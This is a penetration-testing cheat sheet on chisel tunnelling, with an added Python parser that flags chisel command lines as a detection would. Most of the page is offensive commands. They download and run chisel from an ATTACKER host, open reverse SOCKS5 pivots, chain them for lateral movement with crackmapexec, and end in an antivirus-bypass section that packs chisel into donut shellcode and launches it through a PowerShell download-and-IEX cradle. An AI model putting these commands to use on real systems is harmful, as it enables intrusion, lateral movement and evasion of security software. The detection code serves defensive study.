Chisel

Chisel Instance

I use only one instance to manage multiple proxy endpoints.
(replace bla:bla with other random credentials if you want to)
docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80
docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel # Get container ip, probably 172.17.0.2
docker logs chisel -f # Stream logs

Target as Socks5

Upload chisel to the target and connect it back to the chisel server.
Don't forget to set the credentials if you replaced them in the first step.
POWERSHELL
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe")
Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks"
CMD ALTERNATIVE
START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks
# If you need to kill all chisel processes ...
# taskkill /F /IM chisel.exe

Linux
wget http://ATTACKER/chisel -O /tmp/chisel; chmod 755 /tmp/chisel
/tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks &
Great, our chisel container now listens on port 5000 as a SOCKS5 proxy!
Here is an example of how to use it with proxychains:
echo -e '[ProxyList]\nsocks5 172.17.0.2 5000'>/tmp/TARGET1
proxychains -q -f /tmp/TARGET1 crackmapexec smb TARGET_NETWORK

Target as Listener

You want the target to listen on a port and forward the traffic back to you?
Let's say you want to chain multiple chisel clients:
TARGET2 => TARGET1:7777 => ATTACKER:443
BASH
# Target1
chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 &

# Target2 (socks5)
chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks &

# Attacker
echo -e '[ProxyList]\nsocks5 172.17.0.2 6000'>/tmp/TARGET2
proxychains -q -f /tmp/TARGET2 crackmapexec smb TARGET2_NETWORK
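The two sections above both rely on chisel's remote syntax: `[R:][local-host:]local-port:remote-host:remote-port` for a port forward, and `[R:][local-host:][local-port:]socks` for a SOCKS5 endpoint, where the `R:` prefix makes the server (not the client) open the listener. The parser below, an added example written for this page and not chisel's own code, turns that syntax into structured fields and then classifies `chisel client` command lines the way a process-creation detection would: a reverse SOCKS remote means the server side gains a pivot through the host that ran it. The sample command lines are constructed from the ones on this page; the defaults (bind `0.0.0.0`, `local-port = remote-port`, SOCKS port `1080`) follow chisel's README, and the list of value-taking flags is assumed from `chisel client --help`.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# `chisel client` flags that consume a value (assumed from `chisel client --help`);
# any other token starting with "-" (e.g. -v) is treated as a boolean flag.
VALUE_FLAGS = {"--auth", "--fingerprint", "--keepalive", "--max-retry-count",
               "--max-retry-interval", "--proxy", "--header", "--hostname",
               "--sni", "--tls-ca", "--tls-key", "--tls-cert"}

# Constructed sample process command lines, modelled on the ones in this page.
SAMPLE_CMDLINES = [
    "/tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks",
    "chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443",
    "chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks",
    r"C:\Users\user\chisel.exe client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks",
    "/usr/bin/python3 script.py",
]


@dataclass
class Remote:
    reverse: bool               # "R:" prefix: the server opens the listener
    socks: bool                 # "socks" remote: a SOCKS5 proxy endpoint
    local_host: str             # listener bind address
    local_port: int             # listener port (on the server side when reverse)
    remote_host: Optional[str]  # None for socks remotes
    remote_port: Optional[int]
    proto: str = "tcp"


def parse_remote(spec: str) -> Remote:
    """Parse one chisel remote spec. Defaults follow chisel's README:
    local-host 0.0.0.0, local-port = remote-port, remote-host 0.0.0.0, socks 1080."""
    reverse = spec.startswith("R:")
    if reverse:
        spec = spec[2:]
    proto = "tcp"
    if "/" in spec:                       # optional "/udp" suffix
        spec, proto = spec.rsplit("/", 1)
    parts = spec.split(":")
    if parts[-1] == "socks":
        head = parts[:-1]                 # [] | [port] | [host, port]
        if len(head) > 2:
            raise ValueError(f"bad socks remote: {spec}")
        host = head[0] if len(head) == 2 else "0.0.0.0"
        port = int(head[-1]) if head else 1080
        return Remote(reverse, True, host, port, None, None, proto)
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"bad remote: {spec}")
    rport = int(parts[-1])
    rhost = parts[-2] if len(parts) >= 2 else "0.0.0.0"
    lport = int(parts[-3]) if len(parts) >= 3 else rport
    lhost = parts[0] if len(parts) == 4 else "0.0.0.0"
    return Remote(reverse, False, lhost, lport, rhost, rport, proto)


def _basename(token: str) -> str:
    # Strip either kind of path separator so chisel.exe and /tmp/chisel both match.
    return re.split(r"[\\/]", token)[-1].lower()


def parse_chisel_client(cmdline: str) -> Optional[Tuple[str, List[Remote]]]:
    """Return (server, remotes) for a `chisel client` command line, else None.
    Plain whitespace splitting is enough for the unquoted forms used here."""
    toks = cmdline.split()
    idx = next((i for i, t in enumerate(toks) if _basename(t).startswith("chisel")), None)
    if idx is None or idx + 1 >= len(toks) or toks[idx + 1] != "client":
        return None
    positionals: List[str] = []
    i = idx + 2
    while i < len(toks):
        if toks[i] in VALUE_FLAGS:
            i += 2                        # skip the flag and its value
        elif toks[i].startswith("-"):
            i += 1                        # boolean flag
        else:
            positionals.append(toks[i])
            i += 1
    if not positionals:
        return None
    return positionals[0], [parse_remote(r) for r in positionals[1:]]


def assess(cmdline: str) -> List[Tuple[str, str]]:
    """Classify a command line into (severity, description) findings."""
    parsed = parse_chisel_client(cmdline)
    if parsed is None:
        return []
    server, remotes = parsed
    findings: List[Tuple[str, str]] = []
    for r in remotes:
        if r.reverse and r.socks:
            findings.append(("high", f"reverse SOCKS: {server} gets a SOCKS5 pivot through this host on server port {r.local_port}"))
        elif r.reverse:
            findings.append(("high", f"reverse forward: {server}:{r.local_port} -> {r.remote_host}:{r.remote_port} via this host"))
        elif r.socks:
            findings.append(("medium", f"local SOCKS5 listener {r.local_host}:{r.local_port} egressing through {server}"))
        else:
            findings.append(("medium", f"local listener {r.local_host}:{r.local_port} -> {r.remote_host}:{r.remote_port} tunnelled through {server}"))
    if not remotes:
        findings.append(("low", f"chisel client to {server} with no remotes"))
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for severity, text in assess(line):
            print(f"[{severity}] {text}  <- {line}")
```

The chained setup from the section above shows up as two separate findings on two hosts: TARGET1 gets a medium "local listener TARGET1IP:7777 -> ATTACKER:443" finding, and TARGET2 gets a high "reverse SOCKS" finding whose server is `TARGET1IP:7777` rather than the attacker, which is exactly the hop that correlating process logs across hosts needs to reveal.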

Win AV bypass

LHOST="192.168.45.216"
LPORT=443

PARAMS="client -v --auth bla:bla $LHOST:$LPORT R:0.0.0.0:5000:socks"
INPUT_FILE='/var/www/html/chisel.exe'
SHELLCODE_OUTPUT_FILE='/tmp/chiselsc'
ENCODED_PAYLOAD_FILE='/var/www/html/chiselsc'
python3 -c "import donut; donut.create(thread=0,compress=2,bypass=1,exit_opt=3,arch=2,file='$INPUT_FILE',output='$SHELLCODE_OUTPUT_FILE',params=bytes.fromhex('$( echo -en "$PARAMS" | xxd -plain | tr -d '\n' )').decode('utf-8'))"
cat "$SHELLCODE_OUTPUT_FILE" | xxd -plain | tr -d '\n' | rev | gzip | sudo tee "$ENCODED_PAYLOAD_FILE" >/dev/null

cat <<'EOF'|sudo tee /var/www/html/startchisel
$loadsc="$web/loadsc"; $sc="$web/chiselsc"; $python="$web/python.zip"; $dir="$env:TEMP";
$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")};
$arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
EOF

Then call chisel from the target:
$web="http://192.168.45.216";IEX(New-Object Net.WebClient).downloadString("$web/startchisel")